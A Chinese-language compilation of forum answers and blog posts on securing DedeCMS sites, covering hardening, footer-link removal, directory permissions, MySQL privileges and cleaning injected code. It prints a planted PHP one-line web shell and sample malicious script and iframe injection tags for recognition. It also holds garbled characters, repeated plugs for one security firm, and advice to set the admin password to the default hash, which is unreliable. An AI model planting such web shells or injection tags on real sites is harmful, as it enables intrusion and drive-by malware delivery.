dedecms的漏洞:Dedecms的隐患如何预防风险

1、隐藏好IP，做好防护。

2、网站使用CDN。就近接入，就是利用DNS服务找到离用户最近的机器，从而达到最短路径提供服务，DNS服务理论上可以找到所有这个公司的机房和IP，从而还能够进行流量的调度。

3、服务器的补丁一定及时打好，不定时更新很有必要。

4、网站后台的路径要隐藏好，很多网站都不注意这一点，很容易被攻击。

5、网站的账号密码要设置复杂点，平常注册的时候提示什么数字字母特殊符号的。

6、服务器备份。而且要及时更新备份，不要等到失去是后悔莫及。

7、服务器的防火墙。不要乱传来路不明以及不好的内容到网站的目录。

8、常用的端口都要关闭。

9、一定要开启防火墙。

10、最后注意不要存在弱命令。

如果网站价值较高，建议找专业的安全公司来解决，国内也就Sinesafe和绿盟等安全公司 比较专业

自从dedecms织梦系统更新到67日的版本，底部版权信息调用标签{dede:globalcfg_powerby/}会自动加上织梦官方

的链接[Power by DedeCms ]，想必很多新用户使用中都想去除这个官方的链接，由于这是官方的作为，本文只是提供一个技术的交流，并不鼓

励大家去除底部的链接。好了，回归正题，大家知道，进入后台在后台的系统-系统参数有个网站版权信息，在这里并不能找到官方的链接，由此可看，这是被官方

进行了加密处理了，想要去掉这个链接就需要不调用{dede:globalcfg_powerby/}这个标签，而使用其他变量代替。思路就是新建一个

变量作为我们的网站版权信息来调用，好了下面就看看如何做：

方法1新建一个变量；进入系统——系统基本参数—— 添加新变量右上角如下图：

这

样，点击保存变量，就会在后台参数多出一个网站底部信息变量的输入框，如何调用此标签？跟以前的调用网站版权信息一样格式：

{dede:globaldede_powerby/}；在footerhtm底部模板加上此标签即可。有了我们自己的版权信息变量，我们就可以删除

之前系统自带的版权信息变量。

我们使用sql命令工具在系统设置下面有个sql命令工具在输入框输入以下SQL语句，即可删除系统的版权信息变量。SQL语句：DELETE

FROM dede_sysconfig WHERE varname = "cfg_powerby"

方法2修改源码除了添加另一个变量之

外，还可以看看官方的最新补丁使用到什么，通过查看67日官方更新补丁，织梦DedeCMS官方在6月7号的安全补丁主要更新文件是

include/dedesqlclassphp,修复变量覆盖漏洞。但是下面的这段代码明显是不正常的，为什么要用这种编码呢？删除该文件的下面这

段代码就可以解决这个问题了。代码如下：

$arrs1 =

array(0x63,0x66,0x67,0x5f,0x70,0x6f,0x77,0x65,0x72,0x62,0x79);$arrs2 =

array(0x20,0x3c,0x61,0x20,0x68,0x72,0x65,0x66,0x3d,0x68,0x74,0x74,0x70,0x3a,0x2f,0x2f,

0x77,0x77,0x77,0x2e,0x64,0x65,0x64,0x65,0x63,0x6d,0x73,0x2e,0x63,0x6f,0x6d,0x20,0x74,0x61,0x72,

0x67,0x65,0x74,0x3d,0x27,0x5f,0x62,0x6c,0x61,0x6e,0x6b,0x27,0x3e,0x50,0x6f,0x77,0x65,0x72,0x20,

0x62,0x79,0x20,0x44,0x65,0x64,0x65,0x43,0x6d,0x73,0x3c,0x2f,0x61,0x3e);

2个方法随便大家使用哪个，都可以有效去除底部的版权信息

本方法由草坝阁网整理，使用前请注意备份文件。

�谌莺苌伲�赡苄慈氲氖焙虿皇呛芊奖悖�还�庑┐�氲淖饔萌肥挡恍〉摹�edecms一直是很火的建站cms，主要得益于两大站长网的鼎力支持；不过，人火是非多，cms太火了同样会被别有用心的人盯上。我的网站一直在使用dedecms，前段时间又一次受到攻击，攻击的目的很简单，那么便是黑链，知道后稍微修改下代码就恢复了，不是很严重；这段时间网站又被莫名上传文件，类似前一次，虽然对方还没来得及修改网站模板，不过这说明网站安全防患还未到位，对方任何时候都可能再次取得管理员权限，所以要特别注意网站的安全防患措施。因为我比较喜欢寻根究底，所以就去网上找了一下相关的资料，发现这确实是dedecms的漏洞，黑客可以利用多维的变量绕过正则检测，漏洞主要发生在/plus/mytag_jsphp中，原理便是准备一个MySQL数据库来攻击已知网站的数据库，通过向数据库中写入一句话的代码，只要成功写入，那么以后便可以利用这些代码来获得后台管理员权限。结合我的网站被攻击已经别人类似的经历来看，黑客写入的文件主要存在于/plus/文件夹下，目前已知的几个文件包括gaphp、logphp、bphp、b1php等，文件的特征便是短小，内容很少，可能写入的时候不是很方便，不过这些代码的作用确实不小的。下面这是gaphp文件中的部分代码：<title>login</title>no<phpeval($_POST[1])><title>login</title>no<phpeval($_POST[1])><title>login</title>no<phpeval($_POST[1])>实际的代码比上面截取的要长，不过都是这段代码的重复，至于logphp的代码，同这个类似，只有一句话，简单明了，如果你对网络安全稍有了解，那么会知道<php eval($_POST[1]);>是php一句话木马，使用部分指定的工具可以执行这段代码，预计是破解密码的功能。既然已经知道对方是利用什么样的漏洞，同时知道对方利用什么样的原理来利用漏洞，那么要怎么预防这些危险的事发生呢？经过查询大量的资料，我初步整理出下面这些预防漏洞被利用的步骤，希望对同样适用dedecms的站长朋友们有所帮助。一、升级版本打好补丁设置目录权限这是官方对此的解决办法，不管你使用的是什么版本的dedecms，都要及时在后台升级版本自动更新补丁，这是避免漏洞被利用的最重要的一步；同时官方还提供设置目录的方法，主要是设置data、templets、uploads、a为可读写不可执行权限；include、member、plus、后台管理目录等设置为可执行可读不可写入权限；删除install及special目录，具体如何设置见官方说明。二、修改admin账号及密码黑客可能是利用默认admin账号，随后推测密码来破解的，所以修改默认的admin账号非常重要，至于如何修改，方法很多，比较有效的是用phpadmin登陆网站数据库，找到dede_admin数据库表（dede是数据库表前缀），修改其中userid及pwd两项，其中密码一定要修改成f297a57a5a743894a0e4，这是默认的密码admin；修改后去后台登陆，登陆dede后台后修改密码。三、别的值得注意的地方至于更多的细节，同样要注意，尽量别选择太廉价的空间，太廉价的空间很容易出现服务器本身的安全问题，只要服务器出现问题，整个服务器下面的网站都没救了。还有便是，如果没必要，尽量别开通会员注册什么的，使用起来很麻烦；至于网站后台目录，不要写到robotstxt里面，同时每个月至少换一次，管理员密码什么的同样要更换，避免和别的账号密码相同被推测出来。

目录权限设置

web服务器运行的用户与目录所有者用户必须不一样，比如apache运行的用户为www，那么网站目录设置的所有者就应该不能设置为www，而是设置不同于www的用户，如centos。

我们这里假设web服务器以www用户运行，网站分配的用户为centos，dedecms网站根目录为/home/centos/web。

不建议用户把栏目目录设置在根目录， 原因是这样进行安全设置会十分的麻烦， 在默认的情况下，安装完成后，目录设置如下：

1、首先设置网站目录所有者为centos，用户组为www，目录设置为750，文件为640。

cd /home/centos

chown -R centoswww web

find web -type d -exec chmod 750 {} \;

find web -not -type d -exec chmod 640 {} \;

2、data、templets、uploads、a images目录， 设置可读写，不可执行的权限；

设置可读写权限：

cd /home/centos/web

chmod -R 770 data templets uploads a images

设置不可执行权限：

apache的设置，在apache配置文件中加入如下代码（以data目录为例，其它设置基本相同）。

<Directory /home/centos/web/data>

php_flag engine of

</Directory>

<Directory ~ "^/home/centos/web/data">

<Files ~ "php">

Order allow,deny

Deny from all

</Files>

</Directory>

nginx的设置如下：

location ~ ^/(data|templets|uploads|a|images)/\(php|php5)$

{

deny all;

}

3、不需要专题的，建议删除 special 目录， 需要可以在生成HTML后，删除 special/indexphp 然后把这目录设置为可读写，不可执行的权限，上面介绍了如何设置可读写和不可执行的权限，这里就不重复了。

其它需注意问题

1、虽然对 install 目录已经进行了严格处理， 但为了安全起见，我们依然建议把它删除；

2、不要对网站直接使用MySQL root用户的权限，给每个网站设置独立的MySQL用户帐号，许可权限为：

SELECT, INSERT , UPDATE, DELETE,CREATE , DROP , INDEX, ALTER , CREATE TEMPORARY TABLES

由于DEDE并没有任何地方使用存储过程，因此务必禁用 FILE、EXECUTE 等执行存储过程或文件操作的权限。

假设我们建立的数据库名为centosmysql，数据库用户为centosmysql，密码为123456，具体设置命令如下：

mysql -uroot -p

mysql>GRANT SELECT,INSERT,UPDATE,DELETE,CREATE,DROP,INDEX,ALTER,CREATE TEMPORARY TABLES ON centossql TO centossql@localhost IDENTIFIED BY 123456;

mysql>FLUSH PRIVILEGES;

mysql>exit

3、更改默认管理目录dede，改到不易被猜到就好。

4、关注后台更新通知，检查是否打上最新dedeCMS补丁。

不知道你的问题是不是已经得到了解决。我觉得我来回答很有发言权。因为我前段时间也出现了这样的现象。

你看看你的主页的源代码是不是如下这样的，网站标题、关键词、描述都发生了变化，多了如图所示的代码在网站里面。这个就是病毒代码，但是删除之后，过段时间有出现了这样的情况。那是因为删除只是一时的，并没有解决网站漏洞的根本原因。

其实出现这种现象是网站被“跨站脚本攻击（XSS）”了。具体的跨站脚本攻击（XSS）的意思你百度就知道了，有这个漏洞的百科词条。我用的也是dedecms网站，那么具体解决方法就是防范跨站脚本攻击（XSS）漏洞。只有修复了漏洞，才会不再生成这样的病毒sj代码出来。

1、跨站脚本攻击（XSS）的防范方法，X-Frame-Options头设置，具体方法篇幅比较大，参考百度经验《X-Frame-Options头未设置,如何设置？》

2、跨站脚本攻击（XSS）的防范方法，Cookie没有HttpOnly标志，需要设置HttpOnly，参考百度经验《Cookie没有HttpOnly标志咋办？IIS设置HttpOnly》

3、跨站脚本攻击（XSS）的防范方法，dedecms版本升级，dedecms是免费的开源网站，用的用户多，存在的漏洞也多，要不断的打补丁，升级版本。

把以上三点都做好了，你的网站就不会出现跳转到别人网站去的现象了，因为防范了“跨站脚本攻击（XSS）”，别人就不会攻击你的网站，在你网站里面加病毒代码了。我是一个热爱分享的网站站长，可以关注我，跟我一起进步。

一般都是网站程序存在漏洞或者服务器存在漏洞而被攻击了

网站挂马是每个网站最头痛的问题，解决办法：1在程序中很容易找到挂马的代码，直接删除，或则将你没有传服务器的源程序覆盖一次但反反复复被挂就得深入解决掉此问题了。但这不是最好的解决办法。最好的方法还是找专业做安全的来帮你解决掉

听朋友说 SineSafe 不错 你可以去看看。

清马+修补漏洞=彻底解决

所谓的挂马，就是黑客通过各种手段，包括SQL注入，网站敏感文件扫描，服务器漏洞，网站程序0day, 等各种方法获得网站管理员账号，然后登陆网站后台，通过数据库 备份/恢复 或者上传漏洞获得一个webshell。利用获得的webshell修改网站页面的内容，向页面中加入恶意转向代码。也可以直接通过弱口令获得服务器或者网站FTP，然后直接对网站页面直接进行修改。当你访问被加入恶意代码的页面时，你就会自动的访问被转向的地址或者下载木马病毒

清马

1、找挂马的标签，比如有<script language="javascript" src="网马地址"></script>或<iframe width=420 height=330 frameborder=0

scrolling=auto src=网马地址></iframe>，或者是你用360或病杀毒软件拦截了网马网址。SQL数据库被挂马，一般是JS挂马。

2、找到了恶意代码后，接下来就是清马，如果是网页被挂马，可以用手动清，也可以用批量清，网页清马比较简单，这里就不详细讲，现在着重讲一下SQL数据库清马，用这一句语句“update 表名 set 字段名=replace(字段名,'aaa','')”， 解释一下这一句子的意思：把字段名里的内容包含aaa的替换成空，这样子就可以一个表一个表的批量删除网马。

在你的网站程序或数据库没有备份情况下，可以实行以上两步骤进行清马，如果你的网站程序有备份的话，直接覆盖原来的文件即可。

修补漏洞（修补网站漏洞也就是做一下网站安全。）

1、修改网站后台的用户名和密码及后台的默认路径。

2、更改数据库名,如果是ACCESS数据库，那文件的扩展名最好不要用mdb，改成ASP的，文件名也可以多几个特殊符号。

3、接着检查一下网站有没有注入漏洞或跨站漏洞，如果有的话就相当打上防注入或防跨站补丁。

4、检查一下网站的上传文件，常见了有欺骗上传漏洞，就对相应的代码进行过滤。

5、尽可能不要暴露网站的后台地址，以免被社会工程学猜解出管理用户和密码。

6、写入一些防挂马代码，让框架代码等挂马无效。

7、禁用FSO权限也是一种比较绝的方法。

8、修改网站部分文件夹的读写权限。

9、如果你是自己的服务器，那就不仅要对你的网站程序做一下安全了，而且要对你的服务器做一下安全也是很有必要了！

一、目录权限根据统计，绝大部分网站的攻击都在根目录开始的，因此，栏目目录不能设置在根目录。DEDECMS部署完成后，重点目录设置如下：1）将install删除。2) data、templets、uploads、a或html目录， 设置可读写，取消执行的权限（Windows如何设置目录的权限？）；当然对于data文件夹还有更好的解决办法，那就是将data移出站点的根目录。3) 如果网站下不需要专题的，必须删除 special 目录。如果需要的话，有网友是这样建议的：生成HTML后，备份special/indexphp后将其删除，然后把这目录设置为可读写，不可执行的权限；但是，这样做比较麻烦，因为每次生成后就把需要将indexphp文件删除，下次执行“生成”的时候又需要把他还原回来。4) include、member、plus、后台管理目录设置为可执行脚本，可读，但不可写入（安装了附加模块的，book，ask，company，group 目录同样如此设置）。二、其它需注意问题1) 非万不得已的情况下，不要对网站直接使用MySQL root用户的权限，一般情况是，都是一个网站对应一个mysql用户，许可权限为：SELECT, INSERT , UPDATE , DELETECREATE , DROP , INDEX , ALTER , CREATE TEMPORARY TABLES由于DEDE并没有任何地方使用存储过程，因此务必禁用 FILE、EXECUTE 等执行存储过程或文件操作的权限。三、经常留意dede的官方网站，及时打好dede补丁。